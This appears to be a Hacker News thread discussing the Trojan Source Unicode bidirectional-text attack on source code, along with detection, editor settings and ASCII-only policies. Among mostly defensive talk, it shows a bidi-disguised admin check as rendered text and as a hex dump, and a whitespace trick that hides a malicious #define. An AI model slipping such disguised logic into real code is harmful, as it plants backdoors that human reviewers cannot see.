Ah yes you're right - looks like that can be handled with CSS: https://www.w3.org/International/articles/vertical-text/. Although from what I've seen most Japanese websites tend to be left-to-right instead anyway.

Hebrew would be a more valid second example I think. I'd be curious to know how many languages maintain their RTL preference online.

dhosek | karma 7666 | avg karma 2.62 2021-11-01 14:18:00 | [–] similar comments

Japanese¹ isn't a right to left language, exactly. It can be written horizontally, in which case it's L-R, top to bottom, or, vertically, in which case it's top to bottom, with columns running R-L, but functionally, this is still like L-R typesetting, just with the characters rotated 90° CCW and the pages are then read in the same order as pages in a R-L book. This is typical of manga which is why there might have been confusion by the OP about the directionality of Japanese.

???

1. All of this also applies to Chinese and Korean. Interestingly, traditional Mongolian script is also written vertically, but in columns left to right rather than right to left.

capitainenemo | karma 1398 | avg karma 2.4 2021-11-01 09:08:11 | [–] similar comments

This doesn't feel particularly new either? Isn't it pretty much a new variant of https://github.com/reinderien/mimic ?

Which, if one is suspicious of code, can be defeated in vim with: set encoding=latin1

Piskvorrr | karma 5073 | avg karma 1.42 2021-11-02 09:29:11 | [–] similar comments

Which breaks other things, such as every other string that's not written in English. But it's a great tip for a quick check, thanks! (Much more convenient than piping text through xxd)

capitainenemo | karma 1398 | avg karma 2.4 2021-11-02 11:48:49 | [–] similar comments

Yeah, it's definitely just for quick checks if the text is in fact using unicode. But, hopefully just for stuff you're suspicious of where you could mandate no-unicode.

slim | karma 3135 | avg karma 1.95 2021-11-01 09:22:28 | [–] similar comments

  this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly"

That's because vim supports Farsi/Arabic natively from day one. Even if the OS does not support it, you can still write bidirectional and right-to-left text in vim. Never knew the reason, but thanks Bram Molenaar.

smashed | karma 1035 | avg karma 4.5 2021-11-01 09:41:53 | [–] similar comments

I was intrigued by your meta example and I took a look. It took me 3-4 minutes to find the warning, and I was looking for it!

I was expecting a big fat warning on the merge request itself, or maybe on the lines containing the dangerous chars.

In the end, it is a small ? character inserted were the unicode control chars are, and a mouseover tooltip warning about a potential issue.

The warning is good, but why so subtle? Sorry for the criticism. The feature is still a huge positive.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 09:54:24 | [–] similar comments

Thanks for the feedback! Our primary use-case when deciding on it was to flag these up in a code-review situation, to prevent malicious content being submitted in merge requests to unsuspecting projects. We found this made it stand out enough to the reviewer when performing code reviews. I also try to not be too quick to add new alerts or sections to the GUI as we sometimes get criticised for having too much clutter D:

GitHub by comparison went down the alert banner route, from what I can see. I'm not opposed to adding something to that effect as well though - especially for inexperienced reviewers, it would be nice to include some more information about the potential exploit. That could be something we revisit when we add the homoglyph highlighting.

stolsvik | karma 400 | avg karma 1.47 2021-11-02 01:59:54 | [–] similar comments

Thus, one sloppy review by that known tired-in-the-mornings dev, "sure thing, looks like Java..", and your little marking is missed?

lelandbatey | karma 3369 | avg karma 3.06 2021-11-01 12:25:58 | [–] similar comments

I was impatient to find the example you were talking about; as far as I can tell, this is the line with the example: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

And here's what it looks like in various conditions/viewers:

With the fix, this is how it looks in the browser in the Gitlab interface:

    if (accessLevel != "user?") {? // Check if admin ??

Without the fix, viewed raw (and thus viewed in a vulnerable way), it looks like this:

    if (accessLevel != "user") { // Check if admin

And in a hex viewer, it looks like this:

    000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if (acces
    000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2  sLevel != "user.
    000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069  .. ...// Check i
    000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
    000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
    00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f   console.log("Yo
    00000610: 7520 6172 6520 616e 2061 646d 696e 2e22  u are an admin."

Antwnis | karma 82 | avg karma 5.47 2021-11-01 13:06:21 | [–] similar comments

That's a great example ^ that demonstrates exactly how this vulnerability can be easily abused

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:16:45 | [–] similar comments

I personally wish that in repos with the warning enabled, that the ?s were displayed in lieu of the malicious characters instead of in addition to them. For example, I'd rather see this:

          var accessLevel = "user";
          if (accessLevel != "user? ?// Check if admin? ?") {
              console.log("You are an admin.");
          }

than this:

          var accessLevel = "user";
          if (accessLevel != "user?") {? // Check if admin?? 
              console.log("You are an admin.");
          }

robotmay | karma 2959 | avg karma 3.66 2021-11-02 06:47:10 | [–] similar comments

Is that possible to do using CSS with our existing markup? Currently we prepend the ? using ::before. I imagine we could probably hide the existing character and shuffle the ? over where it should be, but it might need some testing across different text sizes I imagine. I'll make a note of it for our next revision :)

josephcsible | karma 22500 | avg karma 3.06 2021-11-03 00:08:42 | [–] similar comments

I don't think what I want is possible with a pure-CSS solution, but I'm not 100% sure.

qwerty456127 | karma 8748 | avg karma 1.93 2021-11-01 05:36:00 | [–] similar comments

Despite I'm not a native English speaker and I meant almost all the programs I ever wrote to be capable of processing any given language (and also have localized UIs in some cases), I see no reason for non-English strings to be allowed in source code and code files except some ad-hoc scripts in which hard-coding some text can be an optimal solution.

We probably just need a git switch which would make it throw an error if it encounters Bidi or any weirdness like that except in resource files.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:48:58 | [–] similar comments

Since most progamming languages are based on english, non-english text in string literals is almost always user-facing and should be put in resource files to make translation into additional languages easier.

Identifiers and comments are a serious problem though. Many application domains use terms that are tricky to translate into english. The translations could be misleading, inappropriate or not unique. Sometimes they are just plain wrong or there is no english word that fits. All of these could cause misconceptions, confusion and bugs, and make reading and working with the code and the running system harder.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 09:04:43 | [–] similar comments

> Many application domains use terms that are tricky to translate into english.

What if instead of translating those terms to English, you just transliterated them to the Latin alphabet?

samus | karma 1894 | avg karma 1.18 2021-11-02 10:26:04 | [–] similar comments

That works perfectly fine for German. For languages with latin-style alphabets it depends on how used people are to work with unaccented text. For some languages (for example Vietnamese[0]), the ASCII fallback modes are quite clumsy. Languages with non-latin alphabets might completely lack a standardized, widely used romanization system that works in ASCII.

For Chinese and Japanese, using a romanization is not really an option. Most romanization systems are intended for academic study, as pronunciation aids and for input methods. Most varieties of Chinese have a huge number of homophones, and the romanization of such texts can be difficult to read unambiguously.

[0]: https://en.m.wikipedia.org/wiki/Vietnamese_Quoted-Readable

qwerty456127 | karma 8748 | avg karma 1.93 2021-11-01 09:13:18 | [–] similar comments

So you mean you can write a program and be unable to explain what it does in plain English?

samus | karma 1894 | avg karma 1.18 2021-11-02 01:19:40 | [–] similar comments

The basic operation can be explained in English, but comments for that are potentially not as important as the implications for the application domain.

mkl | karma 11432 | avg karma 2.64 2021-11-01 06:13:48 | [–] similar comments

Non-English characters are quite useful in comments where you're explaining Unicode processing stuff, and in regexes working with the characters, and when you're using maths notation (proper symbols in comments, Greek letters for variables, etc.), and when you're drawing boxes in a terminal. I'm sure there are many more too.

qwerty456127 | karma 8748 | avg karma 1.93 2021-11-01 07:41:52 | [–] similar comments

I omitted this to keep it simple (this is why I wrote non-English rather than non-ASCII, I actually am a proponent of active usage of proper Unicode symbols like ?, ?, etc, and also TUIs) but yes, I would prefer a rather extended English char-set including Greek letters, mathematical symbols, pseudographics etc. These can be useful and are not much trickier than English letters. But I would certainly like to see at least a warning (I would even prefer an Error actually) if my code file includes anything related to RTL, complex character composition or non-Latin letters other than Greek.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:38:59 | [–] similar comments

It's maybe worth to make a step back and take a new look at the underlying problem.

Source code combines multiple kinds of text. There are

* hierarchical structure,

* mathematical and logical syntax

* literals (especially insidious: text)

* free text in comments and

* markup in documentation

These newly discovered vulnerabilities remind me of the issue of SQL injection, which is also caused by a confusion when combining these kinds of text.

For SQL injection, the solution was to introduce facilities to explicitly combine SQL syntax and dynamic literals. Maybe we need something similar for code that enforces such strict separation. Maybe into different files or nested into a container format. There are already facilities for doing so (resource files, templating languages) but they are opt-in and don't go far enough to address the newly discovered problems.

The cost would be that code could become more difficult to edit with plain-text editors.

metroholografix | karma 830 | avg karma 4.3 2021-11-01 05:39:51 | [–] similar comments

Emacs "fix": (setq bidi-display-reordering nil) in relevant modes.

perihelions | karma 28273 | avg karma 8.36 2021-11-01 05:45:30 | [–] similar comments

I forced it globally, are there reasons that's bad to do?

    (setf (default-value 'bidi-display-reordering) nil)

The BIDI issue looks pretty bad in emacs-gtk: the sneaky text is unnoticeable in lots of modes, unless the cursor just happens to scroll over it.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 09:06:54 | [–] similar comments

Why did you put "fix" in quotes? Isn't that an actual fix for this?

cestith | karma 2277 | avg karma 1.73 2021-11-01 10:01:08 | [–] similar comments

It's more of a workaround that breaks things for people legitimately using RTL strings isn't it?

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:20:42 | [–] similar comments

Yes. I recommend using whitespace-mode to cause these characters to be displayed visually, while still functioning correctly.

dathinab | karma 9826 | avg karma 2.78 2021-11-01 06:05:59 | [–] similar comments

I would say less that they discovered a new vulnerability but they they but needed focus on a long term known problem.

It's just that many people while knowing the problem never considered that it could be used in supply chain attacks.

dwheeler | karma 6180 | avg karma 5.63 2021-11-01 06:09:59 | [–] similar comments

As I previously noted on a related post:

Interesting paper. Note, however, that the general problem is already known and there are a number of pre-existing works that discuss it. This is typically called "underhanded code" or sometimes "maliciously misleading code". I'm surprised that they didn't use the normal term for the problem nor cite the previous work on it - maybe they didn't realize this was a widely-known problem? Previous works on underhanded code didn't discuss Bidi to my knowledge (though other attacks on text like this have exploited Bidi). Here are a number of other materials about underhanded code:

The Obfuscated V Contest (http://graphics.stanford.edu/~danielh/vote/vote.html) was created by Daniel Horn in 2004 and is the earliest “underhanded” programming contest that I found. It was a contest to create source code that looked like it did one thing, but actually did another.

Underhanded C Contest (http://www.underhanded-c.org/) has run in many years. Per its FAQ, "The Underhanded C Contest is an annual contest to write innocent-looking C code implementing malicious behavior."

My PhD dissertation "Fully Countering Trusting Trust through Diverse Double-Compiling" discusses how to counter the "trusting trust" problem & includes a section about maliciously misleading source code. See: https://dwheeler.com/trusting-trust/

The JavaScript Misdirection Contest announced the winner on September 27, 2015 http://misdirect.ion.land/

My paper "Initial Analysis of Underhanded Source Code", (by David A. Wheeler, April, 2020, IDA document: D-13166), discusses underhanded code and the effectiveness of several potential countermeasures. It also includes a number of citations to other works on underhanded code. https://www.ida.org/research-and-publications/publications/a...

kfichter | karma 457 | avg karma 6.35 2021-11-01 06:56:49 | [–] similar comments

First place winner of last year's underhanded Solidity contest used exactly this trick: https://blog.soliditylang.org/2020/12/03/solidity-underhande...

axic | karma 4 | avg karma 4.0 2021-11-01 09:09:43 | [–] similar comments

There was related issue in 2018 regarding line endings, which would allow disguised some lines as code, but keeping them as comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWCgXqLnw8FN...

Both of these were fixed in Solidity shortly after the bug reports.

(P.S. I'm a member of the Solidity team)

kfichter | karma 457 | avg karma 6.35 2021-11-01 22:03:03 | [–] similar comments

This is a great treasure trove of deep Solidity trivia. Thanks for the link!

taviso | karma 3044 | avg karma 16.37 2021-11-01 12:45:42 | [–] similar comments

It's also worth noting that if you're caught playing games like this, there is really no way to explain your actions that would avoid serious consequences.

If however, you used the "bugdoor" method, you can plausibly deny any malicious intent and you will absolutely get away with it.

Too | karma 4126 | avg karma 1.55 2021-11-02 00:34:13 | [–] similar comments

Oldest trick in the book:

    /* Legitimate comment.        <a lot of white space to go off screen> */ #define malicious code

Nobody will notice the horizontal scroll bar.

Piskvorrr | karma 5073 | avg karma 1.42 2021-11-02 09:31:20 | [–] similar comments

Except your IDE and CI should rightfully complain about lines of 160+ characters. That's one of the real reasons for this rule, not just "fits on the screen nicely".

dwheeler | karma 6180 | avg karma 5.63 2021-11-03 18:56:04 | [–] similar comments

That often fails. E.g., Vim has line wrap on by default so you would still see the text.

afrcnc | karma 3207 | avg karma 5.23 2021-11-01 06:40:33 | [–] similar comments

Duplicate: https://news.ycombinator.com/item?id=29061987

pweezy | karma 91 | avg karma 2.39 2021-11-01 06:59:33 | [–] similar comments

It’s not the same thing, but brings to mind Ken Thomason’s famous “Reflections on Trusting Trust” [0] from 1984.

That describes a concept, over several stages, where a compiler can be made to change the behavior of programs it compiles in a difficult-to-find way.

[0]: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

sqs | karma 2979 | avg karma 4.61 2021-11-01 07:12:35 | [–] similar comments

Code search is helpful to see if any of your code contains these characters.

A bunch of hits found across the top ~2M open-source repositories: https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...

To triage, you probably want to first look at hits in code files (not JSON or Markdown, etc.):

https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...

You can set up a self-hosted instance of Sourcegraph to run this across all of your company's code: https://docs.sourcegraph.com/.

TacticalCoder | karma 9117 | avg karma 3.7 2021-11-01 07:30:16 | [–] similar comments

Honest question: would it be that bad to mandate and enforce 100% ASCII source files? Arguably every and any Unicode character and, well, arguably even any string of characters can (should?) go to a properties/resources file (properties/resources files which, btw, also greatly simplifies i18n/l10n).

Then build/commit/test hooks could be used to enforce that source code files are indeed 100% ASCII.

I know, I know... Some are going to lament they don't have their shiny Unicode symbols right in their source file. But... It looks like you get what you pay for.

Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

EamonnMR | karma 4484 | avg karma 2.88 2021-11-01 07:43:03 | [–] similar comments

Having readable unicode in string literals is nice.

Jeff_Brown | karma 2659 | avg karma 1.8 2021-11-01 07:47:49 | [–] similar comments

> Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

It's astounding to me that there's room for such complexity in it. I thought it was just a lot of symbols. What other rules does Unicode have besides changing the order sometimes?

ncc-erik | karma 30 | avg karma 1.58 2021-11-01 11:43:21 | [–] similar comments

The one a lot of folks know about was the soft hyphen (U+00AD) to bypass swear filters. I was able to use normalization to create XSS attacks.

supperburg | karma 232 | avg karma 0.69 2021-11-01 07:55:40 | [–] similar comments

How dare you suggest something sensible. The mob will soon be knocking at your door.

sfgweilr4f | karma 606 | avg karma 3.42 2021-11-01 08:03:59 | [–] similar comments

Give it a few years and unicode will probably be turing-complete. For reasons... likely not good ones though.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:35:00 | [–] similar comments

Unicode rendering already requires multiple finite state machines.

sfgweilr4f | karma 606 | avg karma 3.42 2021-11-02 20:09:08 | [–] similar comments

Alternate cause of SkyNet: a distributed horde of unicode renderers become self-aware. Emojis become command and control codes.

btbuildem | karma 4755 | avg karma 2.82 2021-11-01 08:08:19 | [–] similar comments

That was my first thought -- run all your source through an ASCII-only filter, the problem goes away.

iforgotpassword | karma 7907 | avg karma 3.45 2021-11-01 09:08:20 | [–] similar comments

For projects like the Linux kernel this should be absolutely feasible. A few names in headers get mangled and lose their accents but that should be acceptable. Other projects... Well there's already a couple examples in this comment section why it won't be that easy.

thereddaikon | karma 2232 | avg karma 3.35 2021-11-01 08:17:28 | [–] similar comments

Seems the bigger complaint isn't lack of fancy unicode in comments its non-english speakers with non latin alphabets wont be able to comment in their native language.

I'll leave it up to others to discuss how important this is or isn't.

dotancohen | karma 9525 | avg karma 1.72 2021-11-01 08:30:24 | [–] similar comments

Though I comment source in English, lots of people that I work with comment in other languages. ???? ?????, ????? ?????.?

InfiniteRand | karma 503 | avg karma 1.37 2021-11-01 09:40:55 | [–] similar comments

Might be nice to have an easy tool to scan files and whitelist characters from specific alphabets, because in most international teams I think you'll have a common language for comments, and so I think it's unlikely that you'll need say European and Indic and Chinese characters in one code base. Except the one pain point I can see - @author annotations in the source code, if you have an international team you might end up with a variety of scripts in that field, in my mind that's something that can be lived without, but I can imagine some people being sensitive about that.

SavantIdiot | karma 4263 | avg karma 2.96 2021-11-01 12:16:05 | [–] similar comments

Wouldn't simply stripping comments before doing any other processing solve the problem? I know there are plenty of programs that sprinkle code into comments, from Emacs to linters. Or is this obviously naive?

Seems to me that if you need to put code in the comments, you've got a bigger problem. I know people like tab hints and lint overrides, but maybe it is time to focus on separation of concerns at a higher level?

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:34:02 | [–] similar comments

> Wouldn't simply stripping comments before doing any other processing solve the problem?

No, because the exploit line doesn't contain a comment. It just looks like it does.

aidenn0 | karma 26449 | avg karma 2.17 2021-11-01 18:59:04 | [–] similar comments

Even ignoring the fact that non-english speakers will want to (and do; I worked on a compiler with SJIS support 20 years ago) write comments in their native languages, it's unavoidable to have non-ascii characters in your string literals unless you want to regress user-interfaces to 1980.

account42 | karma 5969 | avg karma 0.98 2021-11-02 10:06:40 | [–] similar comments

> it's unavoidable to have non-ascii characters in your string literal

It might not be ideal for you, but you can always use escape codes in your string literals so it is at least possible to avoid all non-ascii characters in your code.

Pxtl | karma 17051 | avg karma 3.07 2021-11-01 07:36:03 | [–] similar comments

I skimmed the article but I didn't see any examples of this being exploited... Has anybody done a proof of concept on how Bidi can be used? I'm having trouble thinking of a line of code with a comment or literal where the code is legit forwards but malicious backwards.

sqs | karma 2979 | avg karma 4.61 2021-11-01 07:41:16 | [–] similar comments

This issue has been raised before, such as at https://github.com/golang/go/issues/20209 (I was reminded of that by https://twitter.com/peter_szilagyi/status/145515080347229798...). There is some other interesting discussion there.

pabs3 | karma 43824 | avg karma 6.39 2021-11-01 07:43:30 | [–] similar comments

Are there any linters that detect these sorts of issues?

marcodiego | karma 25112 | avg karma 7.05 2021-11-01 09:08:26 | [–] similar comments

I thought this was a case of Source code virus[1]. With the current popularity of open source and services like github, combined with deep inter-dependencies in node.js, a virus of this kind could have a huge impact if unnoticed for long enough.

Maybe it is the next plague waiting to happen?

[1] https://en.wikipedia.org/wiki/Source_code_virus

mwcampbell | karma 10942 | avg karma 3.15 2021-11-01 10:01:05 | [–] similar comments

> So you can use them in source code that appears innocuous to a human reviewer

To a sighted human reviewer. If I'm not mistaken, a blind programmer using a screen reader would be immune to this trick.

brazzy | karma 9490 | avg karma 2.91 2021-11-01 10:03:15 | [–] similar comments

If the screen reader understands Bidi (which it needs to in order to support some languages), maybe not.

throw10920 | karma 3071 | avg karma 2.05 2021-11-01 10:03:42 | [–] similar comments

Or, hear me out - instead of trying to work around a legitimate feature of Unicode, you could stop storing your source code as text, because it isn't. Code is not text - it's a tree of objects, and representing it as a flat sequence of text characters causes many problems and inefficiencies (including this one!) that could be mitigated if you just stored and manipulated it as a tree.

The only reason why text was justifiable as a storage and manipulation format for code in the first place was because early computers (probably?) couldn't handle a tree format. That excuse has been invalid for several decades now, as is the idea that "everything is plain text". Code isn't plain text - if it was, then you could make arbitrary edits without syntax errors, but you can't, because code has structure. Start treating it that way.

shaunxcode | karma 1706 | avg karma 2.08 2021-11-01 10:08:21 | [–] similar comments

Yes! This would also do away with a whole class of conflicts related to whitespace/formatting.

throw10920 | karma 3071 | avg karma 2.05 2021-11-01 13:42:36 | [–] similar comments

Exactly! Imagine a version control system where you get diffs on the AST tree, instead of the characters that make up the source (add an `if` and suddenly dozens of lines have "changed"), or the tabs/spaces flamewar evaporating instantly.

account42 | karma 5969 | avg karma 0.98 2021-11-02 10:12:55 | [–] similar comments

Nothing is stopping your current version control tool from parsing the code and showing a structural difff now.

rocqua | karma 9129 | avg karma 2.16 2021-11-01 10:41:21 | [–] similar comments

The thing about text is that it is barebones. Everyone can agree what the structure of text is (a stream of bytes with some ascii like encoding).

For representing code as more than text, you will lose so much tools that can handle your code, it's a massive set back. Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

throw10920 | karma 3071 | avg karma 2.05 2021-11-01 13:41:23 | [–] similar comments

> The thing about text is that it is barebones.

That's a bug. Programming is hard, and you want the best, most powerful tools to handle it as you can - which means putting effort into making specialized tools instead of using generic ones like text editors.

> For representing code as more than text, you will lose so much tools that can handle your code, it's a massive set back.

No tools existed without first being built, so this isn't special. Rust didn't have any tools before people started building tools for it, for instance.

Moreover, the tools that we have now that are text-specific are pathetic. You can view the first n lines of a file? Wow, very impressive /s. More complex things like grep are just as realizable in a structure editor, and in order to use them for non-trivial stuff, you'd have to write structural regular expressions and implement mini-parsers anyway - things you would get for free if you just kept code as structure.

> Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

You're misreading my argument. I'm not saying that people will adopt structured code (a descriptive statement), I'm saying that people should adopt structure code (a normative statement) because it'll be much better for them.

Also, you're making the assumption that onboarding is hard, and that compatibility layers can't exist - neither of which are true.

> Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

The average programmer probably looks at their code with a hex editor once in their life - this isn't really a good argument. Moreover, the vast majority of programmers already tolerate not looking under the hood in dozens of different ways - most use VM's like CPython/JVM/JS VMs, opaque frameworks like React/Angular, graphics APIs like OpenGL/DirectX/Vulkan, complicated editors like Visual Studio Code/Emacs, and far more without ever looking under the hood of any of those - so there's no reason to not add another layer (especially because you can build that layer to be easy to peer through) for the sake of productivity.

scintill76 | karma 1920 | avg karma 1.86 2021-11-01 13:55:43 | [–] similar comments

Also helps with naming. Only need a value once or twice? Don’t bother trying to name it, just link it into the tree where it’s needed.

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:13:36 | [–] similar comments

You can actually do that in Lisp. Lisp code is commonly thought of as a tree, but it is really a bunch of linked lists. The links can be arranged in any way you want.

http://www.lispworks.com/documentation/HyperSpec/Body/02_dhp...

The example shows this with some made–up data, but you can use it with arbitrary code as well. It is very easy to use it to create circular lists, which when executed are infinite loops.

Naturally the only sane thing to do is to keep your code strictly a tree.

a-dub | karma 3806 | avg karma 2.07 2021-11-01 10:58:05 | [–] similar comments

wasn't there something a while back where people were triggering buffer overflows in terminal emulators with malicious (and invisible to the pretty printed eye) escape codes?

ziml77 | karma 4073 | avg karma 2.52 2021-11-01 11:18:15 | [–] similar comments

Would the solution to this be to render the direction switch control character similar to how some text editors will render 0 bytes as a glyph with the text NUL? You could still render everything after it with the reversed direction, but it provides a visible indicator that it's been done. It might be a little annoying for people who use RTL languages, but it seems like the benefit may outweigh that.

pdonis | karma 17088 | avg karma 1.99 2021-11-01 11:34:24 | [–] similar comments

This article talks about compilers, but what about interpreted languages like Python or Lisp?

banana_giraffe | karma 4049 | avg karma 4.56 2021-11-01 11:59:21 | [–] similar comments

For anyone that wants to see the real code:

https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...

I've not seen one editor yet that doesn't at least hint there's a problem with syntax highlighting, if not just outright show nonsense.

SavantIdiot | karma 4263 | avg karma 2.96 2021-11-01 12:09:07 | [–] similar comments

This exploit requires comments.

I think most code is safe.

user2994cb | karma 131 | avg karma 1.41 2021-11-01 12:35:35 | [–] similar comments

I'm sure there are some creative uses in C-style comments for U+2215, Division Slash: /

WalterBright | karma 71923 | avg karma 2.96 2021-11-01 13:30:37 | [–] similar comments

Homoglyphs are a disaster and should never have been admitted into Unicode. There should never have been invisible semantic information embedded in Unicode.

Gunax | karma 1395 | avg karma 1.84 2021-11-01 14:59:03 | [–] similar comments

I am still confused. Is the text not visible?

If I write some text in a comment, it should still be visibe, regardless of direction/bidi code, right?

Too | karma 4126 | avg karma 1.55 2021-11-02 00:45:21 | [–] similar comments

Is there any pre-commit check one can use to totally block this in my repo?

Others might have legitimate use case for this but I certainly don’t, we keep localization in known file types only.

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:25:08 | [–] similar comments

A pre–commit hook is just a script that returns 0 to allow the commit. If you want to block commits containing certain characters, just make a hook that runs grep -v with a suitable search expression.

Legal | privacy